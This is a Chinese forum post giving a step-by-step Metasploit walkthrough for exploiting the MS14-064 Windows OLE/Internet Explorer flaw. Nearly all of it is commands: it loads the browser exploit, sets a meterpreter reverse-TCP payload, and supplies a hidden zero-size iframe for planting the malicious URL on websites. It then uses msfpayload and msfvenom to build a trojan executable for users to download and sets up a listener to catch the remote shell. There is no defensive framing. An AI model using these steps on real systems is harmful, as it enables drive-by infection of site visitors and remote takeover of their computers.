本帖最后由 bailancheng 于 2019-10-13 19:13 编辑
ms14_064:顾名思义为14年第六十四个漏洞
漏洞利用环境:
远程攻击者可利用此漏洞通过构造的网站执行任意代码。
影响Win95+IE3 ~Win10+IE11全版本。
Metasploit中此漏洞的利用模块是exploit/windows/browser/ms14_064_ole_code_execution,
由于这个exploit需要调用powershell,因而只对安装有powershell的系统有效。
调用exploit
msf > use exploit/windows/browser/ms14_064_ole_code_execution
查看选项
msf exploit(ms14_064_ole_code_execution) > show options
设置允许调用powershell
msf exploit(ms14_064_ole_code_execution) > set AllowPowershellPrompt true
设置本机IP
msf exploit(ms14_064_ole_code_execution) > set srvhost 192.168.80.147
调用payload
msf exploit(ms14_064_ole_code_execution) > set payload windows/meterpreter/reverse_tcp
查看选项
msf exploit(ms14_064_ole_code_execution) > show options
设置监听IP
msf exploit(ms14_064_ole_code_execution) > set lhost 192.168.80.147
设置监听端口
msf exploit(ms14_064_ole_code_execution) > set lport 5555
运行
msf exploit(ms14_064_ole_code_execution) > run(或exploit)
攻击开始会显示有木马的url,可以在网站上挂马:
<iframe src=http://192.168.80.147:8080/T8H6L4XgLAQQqdN width=0 height=0 frameborder=0></iframe>
也可以生成木马:
可以利用Kali中的msfpayload工具将Metasploit 中的payloads包装成一个可执行的文件,或者包装成指定的类型,从而生成木马。
root@localhost:~# msfpayload windows/meterpreter/reverse_tcp LHOST=本机IP LPORT=指定端口 X > /root/ma.exe
在Kali2中将msfpayload和msfencode组合在一起,称为msfvenom。
root@localhost:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.4.191 lport=4444 -f exe -o /root/ma.exe
在这里生成木马之后就可以放在网站目录中生成了木马文件。
用户点击下载之后:
调用exploit模块
msf > use exploit/multi/handler
设置payload
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.80.147
msf exploit(handler) > set LPORT 4444
|